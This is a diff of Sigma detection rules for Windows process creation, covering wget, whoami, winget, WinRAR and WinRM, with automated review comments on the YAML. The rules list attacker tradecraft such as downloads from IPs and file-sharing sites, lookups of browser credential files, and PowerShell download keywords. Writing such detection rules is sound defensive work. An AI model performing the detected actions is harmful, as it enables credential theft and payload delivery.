+++ b/sigma/sysmon/process_creation/proc_creation_win_wget_download_direct_ip.yml @@ -1,8 +1,7 @@ title: Suspicious File Download From IP Via Wget.EXE id: 17f0c0a8-8bd5-4ee0-8c5f-a342c0199f35 status: experimental -description: Detects potentially suspicious file downloads directly from IP addresses - using Wget.exe +description: Detects potentially suspicious file downloads directly from IP addresses using Wget.exe references: - https://www.gnu.org/software/wget/manual/wget.html author: Nasreddine Bencherchali (Nextron Systems) @@ -18,17 +17,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wget.exe - - OriginalFileName: wget.exe + - Image|endswith: \wget.exe + - OriginalFileName: wget.exe selection_ip: - CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} + CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_flag: - - CommandLine|re: \s-O\s - - CommandLine|contains: --output-document + - CommandLine|re: \s-O\s + - CommandLine|contains: --output-document selection_ext: - CommandLine|endswith: + CommandLine|endswith: - .ps1 - .ps1' - .ps1" diff --git a/sigma/sysmon/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml b/sigma/sysmon/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml index 874e3ef92..390e98c05 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml 
@@ -1,8 +1,7 @@ title: Suspicious File Download From File Sharing Domain Via Wget.EXE id: a0d7e4d2-bede-4141-8896-bc6e237e977c status: experimental -description: Detects potentially suspicious file downloads from file sharing domains - using wget.exe +description: Detects potentially suspicious file downloads from file sharing domains using wget.exe references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv @@ -20,11 +19,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wget.exe - - OriginalFileName: wget.exe + - Image|endswith: \wget.exe + - OriginalFileName: wget.exe selection_websites: - CommandLine|contains: - - .githubusercontent.com + CommandLine|contains: + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ @@ -49,12 +48,12 @@ detection: - transfer.sh - ufile.io selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_flag: - - CommandLine|re: \s-O\s - - CommandLine|contains: --output-document + - CommandLine|re: \s-O\s + - CommandLine|contains: --output-document selection_ext: - CommandLine|endswith: + CommandLine|endswith: - .ps1 - .ps1' - .ps1" diff --git a/sigma/sysmon/process_creation/proc_creation_win_where_browser_data_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_where_browser_data_recon.yml index 0925cc872..4c7c10545 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_where_browser_data_recon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_where_browser_data_recon.yml 
@@ -1,16 +1,10 @@ title: Suspicious Where Execution id: 725a9768-0f5e-4cb3-aec2-bc5719c6831a status: test -description: 'Adversaries may enumerate browser bookmarks to learn more about compromised - hosts. - - Browser bookmarks may reveal personal information about users (ex: banking sites, - interests, social media, etc.) as well as details about - - internal network resources such as servers, tools/dashboards, or other related - infrastructure. - - ' +description: | + Adversaries may enumerate browser bookmarks to learn more about compromised hosts. + Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about + internal network resources such as servers, tools/dashboards, or other related infrastructure. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md author: frack113, Nasreddine Bencherchali (Nextron Systems) @@ -28,10 +22,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational where_exe: - - Image|endswith: \where.exe - - OriginalFileName: where.exe + - Image|endswith: \where.exe + - OriginalFileName: where.exe where_opt: - CommandLine|contains: + CommandLine|contains: + # Firefox Data - places.sqlite - cookies.sqlite - formhistory.sqlite @@ -39,6 +34,7 @@ detection: - key4.db - key3.db - sessionstore.jsonlz4 + # Chrome Data - History - Bookmarks - Cookies diff --git a/sigma/sysmon/process_creation/proc_creation_win_whoami_all_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_whoami_all_execution.yml index d587ffedd..3e6f023fd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_whoami_all_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_whoami_all_execution.yml 
@@ -21,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_main_img: - - Image|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - Image|endswith: \whoami.exe + - OriginalFileName: whoami.exe selection_main_cli: - CommandLine|contains: + CommandLine|contains: - ' -all' - ' /all' condition: process_creation and (all of selection_main_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_whoami_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_whoami_execution.yml index c8babedd7..6dbee02cc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_whoami_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_whoami_execution.yml @@ -1,8 +1,7 @@ title: Whoami Utility Execution id: e28a5a99-da44-436d-b7a0-2afc20a5f413 status: test -description: Detects the execution of whoami, which is often used by attackers after - exploitation / privilege escalation +description: Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation references: - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/ - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ @@ -22,8 +21,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - Image|endswith: \whoami.exe + - OriginalFileName: whoami.exe condition: process_creation and selection falsepositives: - Admin activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml b/sigma/sysmon/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml index f201d4390..d02abf7de 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml 
@@ -1,11 +1,10 @@ title: Whoami.EXE Execution From Privileged Process id: 79ce34ca-af29-4d0e-b832-fc1b377020db related: - - id: 80167ada-7a12-41ed-b8e9-aa47195c66a1 - type: obsoletes + - id: 80167ada-7a12-41ed-b8e9-aa47195c66a1 + type: obsoletes status: experimental -description: Detects the execution of "whoami.exe" by privileged accounts that are - often abused by threat actors +description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://nsudo.m2team.org/en-us/ @@ -25,8 +24,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: whoami.exe - - Image|endswith: \whoami.exe + - OriginalFileName: whoami.exe + - Image|endswith: \whoami.exe selection_user: User|contains: - AUTHORI diff --git a/sigma/sysmon/process_creation/proc_creation_win_whoami_groups_discovery.yml b/sigma/sysmon/process_creation/proc_creation_win_whoami_groups_discovery.yml index 975778093..2896db461 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_whoami_groups_discovery.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_whoami_groups_discovery.yml @@ -1,9 +1,7 @@ title: Group Membership Reconnaissance Via Whoami.EXE id: bd8b828d-0dca-48e1-8a63-8a58ecf2644f status: test -description: Detects the execution of whoami.exe with the /group command line flag - to show group membership for the current user, account type, security identifiers - (SID), and attributes. +description: Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami author: Nasreddine Bencherchali (Nextron Systems) 
@@ -20,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - Image|endswith: \whoami.exe + - OriginalFileName: whoami.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /groups' - ' -groups' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_whoami_output.yml b/sigma/sysmon/process_creation/proc_creation_win_whoami_output.yml index 9bcc505b0..a05fd07e3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_whoami_output.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_whoami_output.yml @@ -1,9 +1,7 @@ title: Whoami.EXE Execution With Output Option id: c30fb093-1109-4dc8-88a8-b30d11c95a5d status: experimental -description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV - as output format or with redirection options to export the results to a file for - later use. +description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use. references: - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/ - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ @@ -24,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_main_img: - - Image|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - Image|endswith: \whoami.exe + - OriginalFileName: whoami.exe selection_main_cli: - CommandLine|contains: + CommandLine|contains: - ' /FO CSV' - ' -FO CSV' selection_special: - CommandLine|contains: whoami*> + CommandLine|contains: whoami*> condition: process_creation and (all of selection_main_* or selection_special) falsepositives: - Unknown 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_whoami_parent_anomaly.yml b/sigma/sysmon/process_creation/proc_creation_win_whoami_parent_anomaly.yml index 79b5e4f83..5383c9ded 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_whoami_parent_anomaly.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_whoami_parent_anomaly.yml @@ -22,9 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - Image|endswith: \whoami.exe + - OriginalFileName: whoami.exe filter_main_known_parents: + # This list can be any legitimate shell or application that you expect whoami to run from ParentImage|endswith: - \cmd.exe - \powershell_ise.exe @@ -33,11 +34,10 @@ detection: filter_optional_ms_monitoring_agent: ParentImage|endswith: :\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe filter_main_parent_null: - ParentImage: null + ParentImage: filter_main_parent_empty: ParentImage: '' - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Admin activity - Scripts and administrative tools used in the monitored environment diff --git a/sigma/sysmon/process_creation/proc_creation_win_whoami_priv_discovery.yml b/sigma/sysmon/process_creation/proc_creation_win_whoami_priv_discovery.yml index c902aeace..dee624c11 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_whoami_priv_discovery.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_whoami_priv_discovery.yml 
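Review bot: In the second hunk of proc_creation_win_whoami_parent_anomaly.yml, `filter_main_parent_null` now ends in a bare `ParentImage:` with no value; YAML parses an empty value as null, so this should behave like the removed `ParentImage: null`, but next to `filter_main_parent_empty`'s explicit `''` the bare key reads like an unfinished line. A trailing comment would make the intent visible to the next reader, e.g. `ParentImage:  # empty value = YAML null, same as the previous explicit "null"`. If the Hayabusa/Sigma loader treats an empty scalar differently from an explicit null (I have not verified this), keeping the explicit `null` would be the safer form.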
@@ -1,9 +1,7 @@ title: Security Privileges Enumeration Via Whoami.EXE id: 97a80ec7-0e2f-4d05-9ef4-65760e634f6b status: test -description: Detects a whoami.exe executed with the /priv command line flag instructing - the tool to show all current user privileges. This is often used after a privilege - escalation attempt. +description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami author: Florian Roth (Nextron Systems) @@ -22,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - Image|endswith: \whoami.exe + - OriginalFileName: whoami.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /priv' - ' -priv' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_windows_terminal_susp_children.yml b/sigma/sysmon/process_creation/proc_creation_win_windows_terminal_susp_children.yml index 9be890387..bc5c79ba3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_windows_terminal_susp_children.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_windows_terminal_susp_children.yml 
@@ -1,8 +1,7 @@ title: Suspicious WindowsTerminal Child Processes id: 8de89e52-f6e1-4b5b-afd1-41ecfa300d48 status: test -description: Detects suspicious children spawned via the Windows Terminal application - which could be a sign of persistence via WindowsTerminal (see references section) +description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section) references: - https://persistence-info.github.io/Data/windowsterminalprofile.html - https://twitter.com/nas_bench/status/1550836225652686848 
@@ -25,40 +24,43 @@ detection: - \WindowsTerminal.exe - \wt.exe selection_susp: - - Image|endswith: - - \rundll32.exe - - \regsvr32.exe - - \certutil.exe - - \cscript.exe - - \wscript.exe - - \csc.exe - - Image|contains: - - C:\Users\Public\ - - \Downloads\ - - \Desktop\ - - \AppData\Local\Temp\ - - \Windows\TEMP\ - - CommandLine|contains: - - ' iex ' - - ' icm' - - Invoke- - - 'Import-Module ' - - 'ipmo ' - - DownloadString( - - ' /c ' - - ' /k ' - - ' /r ' + - Image|endswith: + # Add more LOLBINS + - \rundll32.exe + - \regsvr32.exe + - \certutil.exe + - \cscript.exe + - \wscript.exe + - \csc.exe + - Image|contains: + # Add more suspicious paths + - C:\Users\Public\ + - \Downloads\ + - \Desktop\ + - \AppData\Local\Temp\ + - \Windows\TEMP\ + - CommandLine|contains: + # Add more suspicious commandline + - ' iex ' + - ' icm' + - Invoke- + - 'Import-Module ' + - 'ipmo ' + - DownloadString( + - ' /c ' + - ' /k ' + - ' /r ' filter_builtin_visual_studio_shell: - CommandLine|contains|all: + CommandLine|contains|all: - Import-Module - Microsoft.VisualStudio.DevShell.dll - Enter-VsDevShell filter_open_settings: - CommandLine|contains|all: + CommandLine|contains|all: - \AppData\Local\Packages\Microsoft.WindowsTerminal_ - \LocalState\settings.json filter_vsdevcmd: - CommandLine|contains|all: + CommandLine|contains|all: - C:\Program Files\Microsoft Visual Studio\ - \Common7\Tools\VsDevCmd.bat condition: process_creation and (all of selection_* and not 1 of filter_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_winget_add_custom_source.yml b/sigma/sysmon/process_creation/proc_creation_win_winget_add_custom_source.yml index 0b40644b6..3296deed7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winget_add_custom_source.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winget_add_custom_source.yml 
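Review bot: The three comments added inside `selection_susp` of proc_creation_win_windows_terminal_susp_children.yml (`# Add more LOLBINS`, `# Add more suspicious paths`, `# Add more suspicious commandline`) read as open TODO instructions rather than as documentation of what each sub-selection covers, so a reader cannot tell whether the lists are considered incomplete. Rewording them to describe the list and mark extension as optional keeps the same hint without implying pending work, e.g. `# LOLBINs commonly launched from a terminal profile; extend as needed for your environment`, and likewise for the path and command-line lists. The `selection_parent` block this selection is combined with starts before the hunk.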
@@ -1,10 +1,10 @@ title: Add New Download Source To Winget id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 related: - - id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 - type: similar - - id: c15a46a0-07d4-4c87-b4b6-89207835a83b - type: similar + - id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 + type: similar + - id: c15a46a0-07d4-4c87-b4b6-89207835a83b + type: similar status: experimental description: Detects usage of winget to add new additional download sources references: @@ -25,10 +25,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \winget.exe - - OriginalFileName: winget.exe + - Image|endswith: \winget.exe + - OriginalFileName: winget.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'source ' - 'add ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml b/sigma/sysmon/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml index 6abf56234..287aa18d5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml 
@@ -1,17 +1,14 @@ title: Add Insecure Download Source To Winget id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 related: - - id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 - type: similar - - id: c15a46a0-07d4-4c87-b4b6-89207835a83b - type: similar + - id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 + type: similar + - id: c15a46a0-07d4-4c87-b4b6-89207835a83b + type: similar status: experimental -description: 'Detects usage of winget to add a new insecure (http) download source. - - Winget will not allow the addition of insecure sources, hence this could indicate - potential suspicious activity (or typos) - - ' +description: | + Detects usage of winget to add a new insecure (http) download source. + Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos) references: - https://learn.microsoft.com/en-us/windows/package-manager/winget/source - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget @@ -30,10 +27,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \winget.exe - - OriginalFileName: winget.exe + - Image|endswith: \winget.exe + - OriginalFileName: winget.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'source ' - 'add ' - http:// diff --git a/sigma/sysmon/process_creation/proc_creation_win_winget_add_susp_custom_source.yml b/sigma/sysmon/process_creation/proc_creation_win_winget_add_susp_custom_source.yml index fb74c505c..5d899caf4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winget_add_susp_custom_source.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winget_add_susp_custom_source.yml 
@@ -1,10 +1,10 @@ title: Add Potential Suspicious New Download Source To Winget id: c15a46a0-07d4-4c87-b4b6-89207835a83b related: - - id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 - type: similar - - id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 - type: similar + - id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 + type: similar + - id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 + type: similar status: experimental description: Detects usage of winget to add new potentially suspicious download sources references: @@ -26,14 +26,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \winget.exe - - OriginalFileName: winget.exe + - Image|endswith: \winget.exe + - OriginalFileName: winget.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'source ' - 'add ' selection_source_direct_ip: - CommandLine|re: ://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} + # This is a best effort. A better way to handle this is to limit it via whitelist. Check Group Policy for more details + CommandLine|re: ://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_winget_local_install_via_manifest.yml b/sigma/sysmon/process_creation/proc_creation_win_winget_local_install_via_manifest.yml index cc382340f..93916753a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winget_local_install_via_manifest.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winget_local_install_via_manifest.yml 
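Review bot: In the second hunk of proc_creation_win_winget_add_susp_custom_source.yml, the comment added above `selection_source_direct_ip` calls the regex a best effort but does not say what it leaves out: `://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}` is unanchored and IPv4-only, so a source URL with an IPv6 literal or a plain hostname is not matched by this selection, while a dotted quad that happens to start a longer hostname is. Since the condition is `all of selection_*`, any such source silently falls outside the rule. Making the scope explicit in the comment would help whoever tunes it later, e.g. `# Matches IPv4 literals only (unanchored); IPv6 literals and hostnames are not covered - prefer a source allow-list via Group Policy`.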
@@ -1,15 +1,10 @@ title: Install New Package Via Winget Local Manifest id: 313d6012-51a0-4d93-8dfc-de8553239e25 status: experimental -description: 'Detects usage of winget to install applications via manifest file. Adversaries - can abuse winget to download payloads remotely and execute them. - - The manifest option enables you to install an application by passing in a YAML - file directly to the client. - +description: | + Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. + The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe, msi or msix files later. - - ' references: - https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install - https://lolbas-project.github.io/lolbas/Binaries/Winget/ @@ -30,19 +25,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \winget.exe - - OriginalFileName: winget.exe + - Image|endswith: \winget.exe + - OriginalFileName: winget.exe selection_install_flag: - CommandLine|contains: + CommandLine|contains: - install - - ' add ' + - ' add ' # https://github.com/microsoft/winget-cli/blob/02d2f93807c9851d73eaacb4d8811a76b64b7b01/src/AppInstallerCLICore/Commands/InstallCommand.h selection_manifest_flag: - CommandLine|contains: + CommandLine|contains: - '-m ' - --manifest condition: process_creation and (all of selection_*) falsepositives: - - Some false positives are expected in some environment that may use this functionality - to install and test their custom applications + - Some false positives are expected in some environment that may use this functionality to install and test their custom applications level: medium ruletype: Sigma 
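Review bot: In the second hunk of proc_creation_win_winget_local_install_via_manifest.yml, `selection_install_flag` keeps the bare substring `install` under `CommandLine|contains`, which also matches `uninstall`; if winget's uninstall command accepts the same `-m`/`--manifest` option (I have not verified this against the linked InstallCommand.h), the rule will fire on manifest-based uninstalls as well, which the title does not cover. Either tighten the value to `' install '` in line with the existing `' add '` entry, or record the broader scope with a comment such as `# "install" also matches "uninstall"; accepted so manifest-based removals are caught too`. The `falsepositives` entry could then mention uninstalls explicitly.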
diff --git a/sigma/sysmon/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml b/sigma/sysmon/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml index 1d0ce137f..6c2b23539 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml @@ -1,11 +1,10 @@ title: Winrar Compressing Dump Files id: 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc related: - - id: ec570e53-4c76-45a9-804d-dc3f355ff7a7 - type: similar + - id: ec570e53-4c76-45a9-804d-dc3f355ff7a7 + type: similar status: experimental -description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" - extension, which could be a step in a process of dump file exfiltration. +description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. references: - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ author: Florian Roth (Nextron Systems) @@ -23,19 +22,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \rar.exe - - \winrar.exe - - Description: Command line RAR + - Image|endswith: + - \rar.exe + - \winrar.exe + - Description: Command line RAR selection_extension: - CommandLine|contains: + CommandLine|contains: - .dmp - .dump - .hdmp condition: process_creation and (all of selection_*) falsepositives: - - Legitimate use of WinRAR with a command line in which ".dmp" or ".dump" appears - accidentally + - Legitimate use of WinRAR with a command line in which ".dmp" or ".dump" appears accidentally - Legitimate use of WinRAR to compress WER ".dmp" files for troubleshooting level: medium ruletype: Sigma 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_winrar_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_winrar_susp_child_process.yml index fb07c3f61..042866ccc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winrar_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winrar_susp_child_process.yml @@ -1,8 +1,8 @@ title: Potentially Suspicious Child Process Of WinRAR.EXE id: 146aace8-9bd6-42ba-be7a-0070d8027b76 related: - - id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343 - type: similar + - id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343 + type: similar status: experimental description: Detects potentially suspicious child processes of WinRAR.exe. references: @@ -24,24 +24,25 @@ detection: selection_parent: ParentImage|endswith: \WinRAR.exe selection_binaries: - - Image|endswith: - - \cmd.exe - - \cscript.exe - - \mshta.exe - - \powershell.exe - - \pwsh.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - OriginalFileName: - - Cmd.Exe - - cscript.exe - - mshta.exe - - PowerShell.EXE - - pwsh.dll - - regsvr32.exe - - RUNDLL32.EXE - - wscript.exe + # Note: add additional binaries that the attacker might use + - Image|endswith: + - \cmd.exe + - \cscript.exe + - \mshta.exe + - \powershell.exe + - \pwsh.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - OriginalFileName: + - Cmd.Exe + - cscript.exe + - mshta.exe + - PowerShell.EXE + - pwsh.dll + - regsvr32.exe + - RUNDLL32.EXE + - wscript.exe condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml index 8093169c5..49257549d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml 
@@ -1,8 +1,7 @@ title: Winrar Execution in Non-Standard Folder id: 4ede543c-e098-43d9-a28f-dd784a13132f status: test -description: Detects a suspicious winrar execution in a folder which is not the default - installation folder +description: Detects a suspicious winrar execution in a folder which is not the default installation folder references: - https://twitter.com/cyb3rops/status/1460978167628406785 author: Florian Roth (Nextron Systems), Tigzy @@ -20,20 +19,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: - - \rar.exe - - \winrar.exe - - Description: Command line RAR + - Image|endswith: + - \rar.exe + - \winrar.exe + - Description: Command line RAR filter_main_unrar: + # Note: we filter unrar as it has the same description as the other utilities, and we're only interested in compression Image|endswith: \UnRAR.exe filter_main_path: Image|contains: - :\Program Files (x86)\WinRAR\ - :\Program Files\WinRAR\ filter_optional_temp: + # Note: in some occasion installers were seen dropping "rar" in TEMP Image|contains: :\Windows\Temp\ - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Legitimate use of WinRAR in a folder of a software that bundles WinRAR level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_winrm_awl_bypass.yml b/sigma/sysmon/process_creation/proc_creation_win_winrm_awl_bypass.yml index e5c72b660..cfdc3c3b5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winrm_awl_bypass.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winrm_awl_bypass.yml 
@@ -1,8 +1,7 @@ title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl id: 074e0ded-6ced-4ebd-8b4d-53f55908119d status: test -description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via - winrm.vbs and copied cscript.exe (can be renamed) +description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) references: - https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 author: Julia Fomina, oscd.community @@ -20,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational contains_format_pretty_arg: - CommandLine|contains: + CommandLine|contains: - format:pretty - format:"pretty" - format:"text" @@ -30,9 +29,8 @@ detection: - C:\Windows\System32\ - C:\Windows\SysWOW64\ contains_winrm: - CommandLine|contains: winrm - condition: process_creation and (contains_winrm and (contains_format_pretty_arg - and not image_from_system_folder)) + CommandLine|contains: winrm + condition: process_creation and (contains_winrm and (contains_format_pretty_arg and not image_from_system_folder)) falsepositives: - Unlikely level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml b/sigma/sysmon/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml index b85b80efc..b105326e2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml 
